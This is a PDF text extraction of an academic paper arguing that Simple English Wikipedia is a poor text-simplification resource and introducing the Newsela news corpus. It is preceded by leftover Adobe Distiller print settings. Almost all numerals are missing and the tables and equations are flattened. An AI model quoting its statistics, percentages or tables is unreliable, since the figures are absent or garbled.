/startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice problems in current text simplification research: new data can help wei xu and chris callison-burch and courtney napoles computer and information science department university of pennsylvania {xwe, ccb}@seas.upenn.edu department of computer science johns hopkins university courtneyn@jhu.edu abstract simple wikipedia has dominated simplifica- tion research in the past years. in this opinion paper, we argue that focusing on wikipedia limits simplification research. we back up our arguments with corpus analy- sis and by highlighting statements that other researchers have made in the simplification literature. we introduce a new simplifica- tion dataset that is a significant improvement over simple wikipedia, and present a novel quantitative-comparative approach to study the quality of simplification data resources. introduction the goal of text simplification is to rewrite com- plex text into simpler language that is easier to un- derstand. research into this topic has many poten- tial practical applications. for instance, it can pro- vide reading aids for people with disabilities (carroll et al., ; canning et al., ; inui et al., ), low-literacy (watanabe et al., ; de belder and moens, ), non-native backgrounds (petersen and ostendorf, ; allen, ) or non-expert knowledge (elhadad and sutaria, ; siddharthan and katsos, ). text simplification may also help improve the performance of many natural language processing (nlp) tasks, such as parsing (chan- drasekar et al., ), summarization (siddharthan et al., ; klebanov et al., ; vanderwende et al., ; xu and grishman, ), semantic role labeling (vickrey and koller, ), information ex- traction (miwa et al., ) and machine transla- tion (gerber and hovy, ; chen et al., ), by transforming long, complex sentences into ones that are more easily processed. the parallel wikipedia simplification (pwkp) corpus prepared by zhu et al. ( ), has become the benchmark dataset for training and evaluating automatic text simplification systems. an associated test set of sentences from wikipedia has been used for comparing the state-of-the-art approaches. the collection of simple-complex parallel sentences sparked a major advance for machine translation- based approaches to simplification. however, we will show that this dataset is deficient and should be considered obsolete. in this opinion paper, we argue that wikipedia as a simplification data resource is suboptimal for several reasons: ) it is prone to automatic sentence align- ment errors; ) it contains a large proportion of in- adequate simplifications; ) it generalizes poorly to other text genres. these problems are largely due to the fact that simple wikipedia is an encyclopedia spontaneously and collaboratively created for “chil- dren and adults who are learning english language” without more specific guidelines. we quantitatively illustrate the seriousness of these problems through manual inspection and statistical analysis. our manual inspection reveals that about % of the sentence pairs in the pwkp corpus are not sim- plifications. we also introduce a new comparative approach to simplification corpus analysis. in par- ticular, we assemble a new simplification corpus of news articles, re-written by professional editors to meet the readability standards for children at multi- this newsela corpus can be requested following the in- structions at: https://newsela.com/data/ transactions of the association for computational linguistics, vol. , pp. – , . action editor: rada mihalcea. submission batch: / ; revision batch / ; published / . c© association for computational linguistics. distributed under a cc-by-nc-sa . license. https://newsela.com/data/ not aligned ( %) [norm] the soprano ranges are also written from middle c to a an octave higher, but sound one octave higher than written. [simp] the xylophone is usually played so that the music sounds an octave higher than written. not simpler [norm] chile is the longest north-south country in the world, and also claims of antarctica as part of its territory. [simp] chile, which claims a part of the antarctic continent, is the longest country on earth. ( %) [norm] death on october , strauss collapsed while hunting with the prince of thurn and taxis in the thurn and taxis forests, east of regensburg. [simp] death on october , , strauß collapsed while hunting with the prince of thurn and taxis in the thurn and taxis forests, east of regensburg. deletion only ( %) [norm] this article is a list of the u.s. states and the district of columbia ordered by population density. [simp] this is a list of the u.s. states, ordered by population density. real simpli- fication paraphrase only ( %) [norm] in , both russia and china also had prison populations in excess of million. [simp] in , both russia and china also had over million people in prison. ( %) deleltion + ( %) paraphrase [norm] all adult muslims, with exceptions for the infirm, are required to offer salat prayers five times daily. [simp] all adult muslims should do salat prayers five times a day. table : example sentence pairs (norm-simp) aligned between english wikipedia and simple english wikipedia. the breakdown in percentages is obtained through manual examination of randomly sam- pled sentence pairs in the parallel wikipedia simplification (pwkp) corpus. ple grade levels. this parallel corpus is higher qual- ity and its size is comparable to the pwkp dataset. it helps us to showcase the limitations of wikipedia data in comparison and it provides potential reme- dies that may improve simplification research. we are not the only researchers to notice prob- lems with simple wikipedia. there are many hints in past publications that reflect the inadequacy of this resource, which we piece together in this pa- per to support our arguments. several different simplification datasets have been proposed (bach et al., ; woodsend and lapata, a; coster and kauchak, ; woodsend and lapata, b), but most of these are derived from wikipedia and not thoroughly analyzed. siddharthan ( )’s ex- cellent survey of text simplification research states that one of the most important questions that needs to be addressed is “how good is the quality of simple english wikipedia”. to the best of our knowledge, we are the first to systematically quantify the qual- ity of simple english wikipedia and directly answer this question. we make our argument not as a criticism of others or ourselves, but as an effort to refocus research di- rections in the future (eisenstein, ). we hope to inspire the creation of higher quality simplification datasets, and to encourage researchers to think crit- ically about existing resources and evaluation meth- ods. we believe this will lead to breakthroughs in text simplification research. simple wikipedia is not that simple the parallel wikipedia simplification (pwkp) cor- pus (zhu et al., ) contains approximately , automatically aligned sentence pairs from cross-linked articles between simple and normal english wikipedia. it has become a benchmark dataset for simplification largely because of its size and availability, and because follow-up papers (woodsend and lapata, a; coster and kauchak, ; wubben et al., ; narayan and gardent, ; siddharthan and angrosh, ; angrosh et al., ) often compare with zhu et al.’s system outputs to demonstrate further improvements. the large quantity of parallel text from wikipedia made it possible to build simplification systems us- ing statistical machine translation (smt) technol- ogy. but after the initial success of these first- generation systems, we started to suffer from the inadequacy of the parallel wikipedia simplification datasets. there is scattered evidence in the litera- ture. bach et al. ( ) mentioned they have at- tempted to use parallel wikipedia data, but opted to construct their own corpus of sentences ( % from new york times and % are from wikipedia) with one manual simplification per sentence. wood- send and lapata ( a) showed that rewriting rules learned from simple wikipedia revision his- tories produce better output compared to the “un- avoidably noisy” aligned sentences from simple- normal wikipedia. the woodsend and lapata ( b) model, that used quasi-synchronous gram- mars learned from wikipedia revision history, left % sentences unchanged in the test set. wubben et al. ( ) found that a phrase-based machine translation model trained on the pwkp dataset of- ten left the input unchanged, since “much of train- ing data consists of partially equal input and out- put strings”. coster and kauchak ( ) constructed another parallel wikipedia dataset using a more so- phisticated sentence alignment algorithm with an additional step that first aligns paragraphs. they no- ticed that % aligned sentences are identical be- tween simple and normal, and retained them in the dataset “since not all sentences need to be simplified and it is important for any simplification algorithm to be able to handle this case”. however, we will show that many sentences that need to be simplified are not simplified in the simple wikipedia. we manually examined the parallel wikipedia simplification (pwkp) corpus and found that it is noisy and half of its sentence pairs are not simplifi- cations (table ). we randomly sampled one-to- one sentence pairs from the pwkp dataset (one-to- many sentence splitting cases consist of only . % of the dataset), and classify each sentence pair into one of the three categories: not aligned ( %) - two sentences have different meanings, or only have partial content overlap. not simpler ( %)- the simp sentence has the same meaning as the norm sentence, but is not simpler. real simplification ( %)- the simp sentence has the same meaning as the norm sentence, and is simpler. we fur- ther breakdown into whether the simplification is due to deletion or paraphrasing. table shows a detailed breakdown and repre- sentative examples for each category. although zhu et al. ( ) and coster and kauchak ( ) have provided a simple analysis on the accuracy of sen- tence alignment, there are some important facts that cannot be revealed without in-depth manual inspec- tion. the “non-simplification” noise in the parallel simple-normal wikipedia data is a much more se- rious problem than we all thought. the quality of “real simplifications” also varies: some sentences are simpler by only one word while the rest of sen- tence is still complex. the main causes of non-simplifications and partial-simplifications in the parallel wikipedia cor- pus include: ) the simple wikipedia was created by volunteer contributors with no specific objective; ) very rarely are the simple articles complete re-writes of the regular articles in wikipedia (coster and kauchak, ), which makes automatic sentence alignment errors worse; ) as an encyclo- pedia, wikipedia contains many difficult sentences with complex terminology. the difficulty of sen- tence alignment between normal-simple wikipedia is highlighted by a recent study by hwang et al. ( ) that achieves state-of-the-art performance of . maximum f score (over the precision- recall curve) by combining wiktionary-based and dependency-parse-based sentence similarities. and in fact, even the simple side of the pwkp corpus contains an extensive english vocabulary of , unique words. , of these words do not exist in the normal side (table ). below is a sentence from an article entitled “photolithography" in simple wikipedia: microphototolithography is the use of pho- tolithography to transfer geometric shapes on a photomask to the surface of a semiconductor wafer for making integrated circuits. we should use the pwkp corpus with caution and consider other alternative parallel simplification cor- pora. alternatives could come from wikipedia (but better aligned and selected) or from manual simpli- fication of other domains, such as newswire. in the pwkp normal simple #words (avg. freq) , ( . ) , ( . ) normal , ( . ) simple , ( . ) table : the vocabulary size of the parallel wikipedia simplification (pwkp) corpus and the vocabulary difference between its normal and sim- ple sides (as a × matrix). only words consisting of the english letters are counted. next section, we will present a corpus of news ar- ticles simplified by professional editors, called the newsela corpus. we perform a comparative corpus analysis of the newsela corpus versus the pwkp corpus to further illustrate concerns about pwkp’s quality. what the newsela corpus teaches us to study how professional editors conduct text sim- plification, we have assembled a new simplification dataset that consists of , news articles. each ar- ticle has been re-written times for children at dif- ferent grade levels by editors at newsela , a com- pany that produces reading materials for pre-college classroom use. we use simp- to denote the most simplified level and simp- to denote the least sim- plified level. this data forms a parallel corpus, where we can align sentences at different reading levels, as shown in table . unlike simple wikipedia, which was created without a well-defined objective, newsela is meant to help teachers prepare curricula that match the en- glish language skills required at each grade level. it is motivated by the common core standards (porter et al., ) in the united states. all the newsela ar- ticles are grounded in the lexile readability score, which is widely used to measure text complexity and assess students’ reading ability. . manual examination of newsela corpus we conducted a manual examination of the newsela data similar to the one for wikipedia data in table . the breakdown of aligned sentence pairs between different versions in newsela is shown in figure . https://newsela.com/ http://en.wikipedia.org/wiki/lexile figure : manual classification of aligned sentence pairs from the newsela corpus. we categorize ran- domly sampled sentence pairs drawn from the original-simp and sentences from the original- simp . it is based on randomly selected sentence pairs and shows much more reliable simplification than the wikipedia data. we designed a sentence alignment algorithm for the newsela corpus based on jaccard similarity (jac- card, ). we first align each sentence in the sim- pler version (e.g. s in simp- ) to the sentence in the immediate more complex version (e.g. s in simp- ) of the highest similarity score. we compute the similarity based on overlapping word lemmas: sim(s ,s ) = |lemmas(s )∩lemmas(s )| |lemmas(s )∪lemmas(s )| ( ) we then align sentences into groups across all ver- sions for each article. for cases where no sentence splitting is involved, we discard any sentence pairs with a similarity smaller than . . if splitting oc- curs, we set the similarity threshold to . instead. newsela’s professional editors produce sim- plifications with noticeably higher quality than wikipedia’s simplifications. compared to sentence alignment for normal-simple wikipedia, automati- cally aligning newsela is more straightforward and reliable. the better correspondence between the simplified and complex articles and the availability of multiple simplified versions in the newsela data also contribute to the accuracy of sentence align- ment. we use the wordnet lemmatization in the nltk package: http://www.nltk.org/ https://newsela.com/ http://en.wikipedia.org/wiki/lexile http://www.nltk.org/ grade level lexile score text l slightly more fourth-graders nationwide are reading proficiently compared with a decade ago, but only a third of them are now reading well, according to a new report. l fourth-graders in most states are better readers than they were a decade ago. but only a third of them actually are able to read well, according to a new report. l fourth-graders in most states are better readers than they were a decade ago. but only a third of them actually are able to read well, according to a new report. l most fourth-graders are better readers than they were years ago. but few of them can actually read well. l fourth-graders are better readers than years ago. but few of them read well. table : example of sentences written at multiple levels of text complexity from the newsela data set. the lexile readability score and grade level apply to the whole article rather than individual sentences, so the same sentences may receive different scores, e.g. the above sentences for the th and th grades. the bold font highlights the parts of sentence that are different from the adjacent version(s). newsela pwkp original simp- simp- simp- simp- normal simple total #sents , , , , , , , total #tokens , , , , , , , , , , , , avg #sents per doc . . . . . — — avg #words per doc , . . . . . — — avg #words per sent . . . . . * . * . avg #chars per word . . . . . . . table : basic statistics of the newsela simplification corpus vs. the parallel wikipedia simplification (pwkp) corpus. the newsela corpus consists of articles with original and simplified versions each. simp- is of the least simplified level, while simp- is the most simplified. the numbers marked by * are slightly different from previously reported, because of the use of different tokenizers. newsela original simp- simp- simp- simp- #words (avg. freq) ** , ( . ) , ( . ) , ( . ) , ( . ) , ( . ) original ( . ) ( . ) ( . ) * ( . ) simp- , ( . ) ( . ) ( . ) ( . ) simp- , ( . ) , ( . ) ( . ) ( . ) simp- , ( . ) , ( . ) , ( . ) ( . ) simp- ** , ( . ) , ( . ) , ( . ) , ( . ) table : this table shows the vocabulary changes between different levels of simplification in the newsela corpus (as a × matrix). each cell shows the number of unique word types that appear in the corpus listed in the column but do not appear in the corpus listed in the row. we also list the average frequency of those vocabulary items. for example, in the cell marked *, the simp- version contains unique words that do not appear in the original version. by comparing the cells marked **, we see about half of the words ( , out of , ) in the original version are not in the simp- version. most of the vocabulary that is removed consists of low-frequency words (with an average frequency of . in the original). . vocabulary statistics table shows the basic statistics of the newsela cor- pus and the pwkp corpus. they are clearly differ- ent. compared to the newsela data, the wikipedia corpus contains remarkably longer (more complex) words and the difference of sentence length before and after simplification is much smaller. we use the penn treebank tokenizer in the moses package. tables and show the vocabulary statistics and the vocabulary difference matrix of the pwkp and newsela corpus. while the vocabulary size of the pwkp corpus drops only % from , unique words to , , the vocabulary size of the newsela corpus is reduced dramatically by . % from , to , words at its most simplified level (simp- ). moreover, in the newsela data, only several hundred words that occur in the simpler ver- sion do not occur in the more complex version. the words introduced are often abbreviations (“national hurricane center” → “nhc”), less formal words (“unscrupulous” → “crooked”) and shortened words (“chimpanzee” → “chimp”). this implies a more complete and precise degree of simplification in the newsela than the pwkp dataset. . log-odds-ratio analysis of words in this section, we visualize the differences in the topics and degree of simplification between the sim- ple wikipedia and the newsela corpus. to do this, we employ the log-odds-ratio informative dirichlet prior method of monroe et al. ( ) to find words and punctuation marks that are statistically overrep- resented in the simplified text compared to the orig- inal text. the method measures each token by the z-score of its log-odds-ratio as: δ (i−j) t√ σ (δ (i−j) t ) ( ) it uses a background corpus when calculating the log-odds-ratio δt for token t, and controls for its vari- ance σ . therefore it is capable of detecting dif- ferences even in very frequent tokens. other meth- ods used to discover word associations, such as mu- https://github.com/moses-smt/ mosesdecoder/blob/master/scripts/ tokenizer/tokenizer.perl tual information, log likelihood ratio, t-test and chi- square, often have problems with frequent words (jurafsky et al., ). we choose the monroe et al. ( ) method because many function words and punctuations are very frequent and play important roles in text simplification. the log-odds-ratio δ(i−j)t for token t estimates the difference of the frequency of token t between two text sets i and j as: δ (i−j) t = log( yit + αt ni + α − (yit + αt) ) − log( y j t + αt nj + α − (yjt + αt) ) ( ) where ni is the size of corpus i, nj is the size of corpus j, yit is the count of token t in corpus i, y j t is the count of token t in corpus j, α is the size of the background corpus, and αt is the count of token t in the background corpus. we use the combination of both simple and complex sides in the corpus as the background. and the variance of the log-odds-ratio is esti- mated by: σ (δ (i−j) t ) ≈ yit + αt + y j t + αt ( ) table lists the top words and punctuation marks that are the most strongly associated with the complex text. both corpora significantly reduce function words and punctuation. the content words show the differences of the topics and subject mat- ters between the two corpora. table lists the top words that are the most strongly associated with the simplified text. the two corpora are more agree- able on what the simple words are than what com- plex words need to be simplified. table shows the frequency and odds ratio of ex- ample words from the top complex words. the odds ratio of token t between two texts sets i and j is defined as: r (i−j) t = yit/y j t ni/nj ( ) it reflects the difference of topics and degree of simplification between the wikipedia and the newsela data. the high proportion of clause-related function words, such as “which” and “where”, https://github.com/moses-smt/mosesdecoder/blob/master/scripts/tokenizer/tokenizer.perl https://github.com/moses-smt/mosesdecoder/blob/master/scripts/tokenizer/tokenizer.perl https://github.com/moses-smt/mosesdecoder/blob/master/scripts/tokenizer/tokenizer.perl linguistic class newsela - original wikipedia (pwkp) - normal punctuation , "– ; ’ ( ) , ; – determiner/pronoun which we an such who i that a whose which whom contraction ’s conjunction and while although and although while prepositions of as including with according by among in despite as with following to of within upon including adverb currently approximately initially primarily subsequently typically thus formerly noun percent director data research decades industry policy development state decade status university residents film commune footballer pays-de-la-loire walloon links midfielder defender goalkeeper adjective federal potential recent executive economic northern northwestern southwestern external due numerous undated various prominent verb advocates based access referred derived established situated considered consists regarded having table : top tokens associated with the complex text, computed using the monroe et al. ( ) method. bold words are shared by the complex version of newsela and the complex version of wikipedia. linguistic class newsela - simp wikipedia (pwkp) - simple punctuation . . determiner/pronoun they it he she them lot it he they lot this she conjunction because adverb also not there too about very now then how about very there noun people money scientists government things countries rules problems group movie people northwest north region loire player websites southwest movies football things adjective many important big new used big biggest famous different important many verb is are can will make get were wants was called help hurt be made like stop want works do live found is made called started pays said was got are like get can means says has went comes make put used table : top tokens associated with the simplified text. newsela pwkp original simp- odds-ratio normal simple odds-ratio which . . where . . advocates . approximately . thus . . table : frequency of example words from table . these complex words are reduced at a much greater rate in the simplified newsela than they are in the simple english wikipedia. a smaller odds ratio indicates greater reduction. newsela - original wikipedia (pwkp) - normal newsela - simp wikipedia (pwkp) - simple pp(of) → in np pp(as) → in np s(is) → np vp . np(it) → prp whnp(which) → wdt pp(of) → in np np(they) → prp s(is) → np vp . sbar(which) → whnp s vp(born) → vbn np np pp s(are) → np vp . s(was) → np vp . pp(to) → to np whnp(which) → wdt s(was) → np vp . np(he) → prp np(percent) → cd nn pp(to) → to np np(people) → nns np(they) → prp whnp(that) → wdt np(municipality) → dt jj nn vp(is) → vbz np np(player) → dt jj jj nn nn sbar(that) → whnp s frag(-) → adjp : np(he) → prp s(are) → np vp . pp(with) → in np frag(-) → frag : frag s(were) → np vp . np(movie) → dt nn pp(according) → vbg pp np()) → nnp nnp nnp np(it) → prp s(has) → np vp . np(percent) → np pp np(film) → dt nn s(can) → np vp . vp(called) → vbn np np(we) → prp np(footballer) → dt jj jj nn s(will) → np vp . vp(is) → vbz pp pp(including) → vbg np np(footballer) → np sbar advp(also) → rb vp(made) → vbn pp sbar(who) → whnp s advp(currently) → rb s(have) → np vp . vp(said) → vbd sbar sbar(as) → in s vp(born) → vbn np np s(could) → np vp . vp(has) → vbz np whnp(who) → wp advp(initially) → rb s(said) → np vp . vp(is) → vbz np np(i) → fw pp(with) → in np s(has) → np vp . np(this) → dt pp(as) → in np whpp(of) → in whnp np(people) → jj nns vp(was) → vbd np np(director) → np pp sbar(although) → in s np(money) → nn np(people) → nns pp(by) → in np advp(primarily) → rb np(government) → dt nn np(lot) → dt nn s(has) → vp s(links) → np vp . s(do) → np vp . np(season) → nn cd pp(in) → in np vp(links) → vbz np np(scientists) → nns s(can) → np vp . sbar(while) → in s pp(following) → vbg np vp(called) → vbn np vp(is) → vbz vp pp(as) → jj in np advp(subsequently) → rb s(had) → np vp . sbar(because) → in s prn(–) → : np : sbar(which) → whnp s s(says) → np vp . vp(are) → vbp np s(’s) → np vp sbar(while) → in s s(would) → np vp . np(player) → dt jj nn nn s(said) → ” s , ” np vp . s(plays) → advp vp s(say) → np vp . np(there) → ex pp(at) → in np pp(within) → in np s(works) → np vp . np(lot) → np pp pp(among) → in np pp(by) → in np s(may) → np vp . np(websites) → jj nns sbar(although) → in s sbar(of) → whnp s s(did) → np vp . pp(like) → in np vp(said) → vbd np s(is) → s : s . s(think) → np vp . s(started) → np vp . table : top syntax patterns associated with the complex text (left) and simplified text (right). bold patterns are the top patterns shared by newsela and wikipedia. that are retained in simple wikipedia indicates the incompleteness of simplification in the sim- ple wikipedia. the dramatic frequency decrease of words like “which” and “advocates” in newsela shows the consistent quality from professional sim- plifications. wikipedia has good coverage on certain words, such as “approximately”, because of its large volume. . log-odds-ratio analysis of syntax patterns we can also reveal the syntax patterns that are most strongly associated with simple text versus com- plex text using the log-odds-ratio technique. ta- ble shows syntax patterns that represent “parent node (head word) → children node(s)" structures from a constituency parse tree. to extract theses patterns we parsed our corpus with the stanford parser (klein and manning, ) and applied its built-in head word identifier from collins ( ). both the newsela and wikipedia corpora exhibit syntactic differences that are intuitive and interest- ing. however, as with word frequency (table ), complex syntactic patterns are retained more often in wikipedia’s simplifications than in newsela’s. in order to show interesting syntax patterns in the wikipedia parallel data for table , we first had to discard sentences in pwkp that contain both "is a commune" and "france". as the word-level analysis in tables and hints, there is an exceeding number of sentences about communes in france in the pwkp corpus, such as the sentence pair below: [norm] la couture is a commune in the pas-de-calais department in the nord-pas-de-calais region of france . [simp] la couture, pas-de-calais is a commune. it is found in the region nord-pas-de-calais in the pas-de-calais department in the north of france. this is a template sentence from a stub geo- graphic article and its deterministic simplification. the influence of this template sentence is more over- whelming in the syntax-level analysis than in the word-level analysis —- about / of the top syn- tax patterns would be related to these sentence pairs if they were not discarded. . document-level compression there are few publicly accessible document-level parallel simplification corpora (barzilay and lap- ata, ). the newsela corpus will enable more research on document-level simplification, such as anaphora choice (siddharthan and copestake, ), content selection (woodsend and lapata, b), and discourse relation preservation (sid- dharthan, ). simple wikipedia is rarely used to study document-level simplification. woodsend and la- pata ( b) developed a model that simplifies wikipedia articles while selecting their most impor- tant content. however, they could only use simple wikipedia in very limited ways. they noted that simple wikipedia is “less mature” with many arti- cles that are just “stubs, comprising a single para- graph of just one or two sentences”. we quantify their observation in figure , plotting the document- level compression ratio of simple vs. normal wikipedia articles. the compression ratio is the ratio of the number of characters between each simple-complex article pair. in the plot, we use all thousand article pairs from the simple-normal wikipedia collected by kauchak ( ) in may . the overall compression ratio is skewed to- wards almost . for comparison, we also plot the ratio between the simplest version (simp- ) and the original version (original) of the news articles in the newsela corpus. the newsela corpus has a much more reasonable compression ratio and is therefore likely to be more suitable for studying document- level simplification. . analysis of discourse connectives although discourse is known to affect readability, the relation between discourse and text simplifica- tion is still under-studied with the use of statistical methods (williams et al., ; siddharthan, ; siddharthan and katsos, ). text simplification often involves splitting one sentence into multiple sentences, which is likely to require discourse-level changes such as introducing explicit rhetorical rela- tions. however, previous research that uses simple- normal wikipedia largely focuses on sentence-level transformation, without taking large discourse struc- ture into account. figure : a radar chart that visualizes the odds ra- tio (radius axis) of discourse connectives in sim- ple side vs. complex side. an odds ratio larger than indicates the word is more likely to occur in the simplified text than in the complex text, and vice versa. simple cue words (in the shaded re- gion), except “hence”, are more likely to be added during newsela’s simplification process than in wikipedia’s. complex conjunction connectives (in the unshaded region) are more likely to be retained in wikipedia’s simplifications than in newsela’s. to preserve the rhetorical structure, siddharthan ( , ) proposed to introduce cue words when simplifying various conjoined clauses. we perform an analysis on discourse connectives that are rel- evant to readability as suggested by siddharthan ( ). figure presents the odds ratios of sim- ple cue words and complex conjunction connectives. the odds radios are computed for newsela between the original and simp- versions, and for wikipedia between normal and simple documents collected by kauchak ( ). it suggests that newsela ex- hibits a more complete degree of simplification than wikipedia, and that it may be able to enable more computational studies of the role of discourse in text simplification in the future. . . . . . . . . . . . . newsela compression ratio d e n si ty wikipedia compression ratio d e n si ty . . . . . . . . figure : distribution of document-level compression ratio, displayed as a histogram smoothed by kernel density estimation. the newsela corpus is more normally distributed, suggesting more consistent quality. . newsela’s quality is better than wikipedia overall, we have shown that the professional sim- plification of newsela is more rigorous and more consistent than simple english wikipedia. the lan- guage and content also differ between the encyclo- pedia and news domains. they are not exchangeable in developing nor in evaluating simplification sys- tems. in the next section, we will review the evalua- tion methodology used in recent research, discuss its shortcomings and propose alternative evaluations. evaluation of simplification systems with the popularity of parallel wikipedia data in simplification research, most state-of-the-art systems evaluate on simplifying sentences from wikipedia. all simplification systems published in the acl, naacl, eacl, coling and emnlp main conferences since zhu’s work compared solely on the same test set that consists of only sentences from wikipedia, except one paper that additionally experimented with short news summaries. the most widely practiced evaluation methodology is to have human judges rate on gram- maticality (or fluency), simplicity, and adequacy (or meaning preservation) on a -point likert scale. such evaluation is insufficient to measure ) the practical value of a system to a specific target reader population and ) the performance of individual simplification components: sentence splitting, dele- tion and paraphrasing. although the inadequacy of text simplification evaluations has been discussed before (siddharthan, ), we focus on these two common deficiencies and suggest two future direc- tions. . targeting specific audiences simplification has many subtleties, since what con- stitutes simplification for one type of user may not be appropriate for another. many researchers have studied simplification in the context of different au- diences. however, most recent automatic simplifica- tion systems are developed and evaluated with little consideration of target reader population. there is one attempt by angrosh et al. ( ) who evaluate their system by asking non-native speakers compre- hension questions. they conducted an english vo- cabulary size test to categorize the users into differ- ent levels of language skills. the newsela corpus allows us to target children at different grade levels. from the application point of view, making knowledge accessible to all children is an important yet challenging part of education (scar- ton et al., ; moraes et al., ). from the tech- nical point of view, reading grade level is a clearly defined objective for both simplification systems and human annotators. once there is a well-defined ob- jective, with constraints such as vocabulary size and sentence length, it is easier to fairly compare differ- ent systems. newsela provides human simplification at different grade levels and reading comprehension quizzes alongside each article. in addition, readability is widely studied and can be automatically estimated (kincaid et al., ; pitler and nenkova, ; petersen and ostendorf, ). although existing readability metrics assume text is well-formed, they can potentially be used in combination with text quality metrics (post, ; louis and nenkova, ) to evaluate simplifica- tions. they can also be used to aid humans in the creation of reference simplifications. . evaluating sub-tasks separately it is widely accepted that sentence simplification in- volves three different elements: splitting, deletion and paraphrasing (feng, ; narayan and gar- dent, ). splitting breaks a long sentence into a few short sentences to achieve better readability. deletion reduces the complexity by removing unim- portant parts of a sentence. paraphrasing rewrites text into a simpler version via reordering, substitu- tion and occasionally expansion. most state-of-the-art systems consist of all or a subset of these three components. however, the pop- ular human evaluation criteria (grammaticality, sim- plicity and adequacy) do not explain which compo- nents in a system are good or bad. more importantly, deletion may be unfairly penalized since shorter out- put tends to result in lower adequacy judgements (napoles et al., ). we therefore advocate for a more informative evaluation that separates out each sub-task. we be- lieve this will lead to more easily quantifiable met- rics and possibly the development of automatic met- rics. for example, early work shows potential use of precision and recall to evaluate splitting (sid- dharthan, ; gasperin et al., ) and deletion (riezler et al., ; filippova and strube, ). several studies also have investigated various met- rics for evaluating sentence paraphrasing (callison- burch et al., ; chen and dolan, ; ganitke- vitch et al., ; xu et al., , ; weese et al., ). summary and recommendations in this paper, we presented the first systematic anal- ysis of the quality of simple wikipedia as a simpli- fication data resource. we conducted a qualitative manual examination and several statistical analyses (including vocabulary change matrices, compres- sion ratio histograms, log-odds-ratio 